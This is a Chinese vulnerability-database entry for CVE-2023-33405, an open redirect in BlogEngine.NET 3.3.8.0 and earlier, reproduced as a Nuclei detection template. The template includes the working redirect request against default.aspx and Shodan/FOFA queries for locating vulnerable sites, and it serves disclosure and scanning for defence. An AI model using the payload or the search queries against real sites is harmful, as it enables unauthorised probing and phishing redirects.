CVE-2023-33405: BlogEngine CMS - Open Redirect

日期: 2025-08-01 | 影响软件: BlogEngine CMS | POC: 已公开

漏洞描述

Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect

PoC代码[已公开]

id: CVE-2023-33405

info:
  name: BlogEngine CMS - Open Redirect
  author: Shankar Acharya
  severity: medium
  description: |
    Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect
  remediation: |
    Update to the latest version of blogengine.net CMS  to fix the open redirect vulnerability.
  reference:
    - https://github.com/hacip/CVE-2023-33405
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33405
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-33405
    cwe-id: CWE-601
    epss-score: 0.49268
    epss-percentile: 0.9772
    cpe: cpe:2.3:a:blogengine:blogengine.net:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: blogengine
    product: blogengine.net
    shodan-query: http.html:"blogengine.net"
    fofa-query: body="blogengine.net"
  tags: cve2023,cve,Blogengine,cms,redirect,blogengine

http:
  - method: GET
    path:
      - "{{BaseURL}}/default.aspx?years=http://oast.pro"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
        part: header
# digest: 490a00463044022073aa6dd291d091aad54b55fea416d63aa265cbdb042e0a32472bc504573d0a3402205dbf40c048851f539932faf846c67807f572f68b6b9193d61f068caedc55ce7d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐